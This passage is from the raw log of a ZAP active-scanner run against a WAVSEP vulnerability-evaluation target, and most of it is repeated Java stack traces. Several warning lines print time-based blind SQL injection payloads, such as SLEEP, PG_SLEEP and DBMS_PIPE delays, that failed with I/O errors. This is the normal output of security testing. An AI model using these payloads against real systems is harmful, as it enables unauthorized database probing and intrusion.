org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679672 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(99)||CHR(79)||CHR(108),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(99)||CHR(79)||CHR(108),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679673 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(71)||CHR(84)||CHR(84),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(71)||CHR(84)||CHR(84),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679674 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(99)||CHR(108)||CHR(75),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(99)||CHR(108)||CHR(75),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679674 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))ManU) AND (3162=3162] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))ManU) AND (3162=3162 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679675 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))NuoL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))NuoL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679676 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))GxUT) AND ('LrOX'='LrOX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))GxUT) AND ('LrOX'='LrOX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679677 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))jTAV) AND 'Vqoq'='Vqoq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))jTAV) AND 'Vqoq'='Vqoq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679678 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))SFSl) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))SFSl) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679678 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))Vkxr)-- eRrt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))Vkxr)-- eRrt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679679 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 1463=(SELECT 1463 FROM PG_SLEEP(5)) AND (7722=7722] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 1463=(SELECT 1463 FROM PG_SLEEP(5)) AND (7722=7722 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679680 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7159=(SELECT 7159 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7159=(SELECT 7159 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679681 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 1510=(SELECT 1510 FROM PG_SLEEP(5)) AND ('ENtO'='ENtO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 1510=(SELECT 1510 FROM PG_SLEEP(5)) AND ('ENtO'='ENtO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679682 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 5526=(SELECT 5526 FROM PG_SLEEP(5)) AND 'OKHN'='OKHN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5526=(SELECT 5526 FROM PG_SLEEP(5)) AND 'OKHN'='OKHN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679683 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 1363=(SELECT 1363 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1363=(SELECT 1363 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 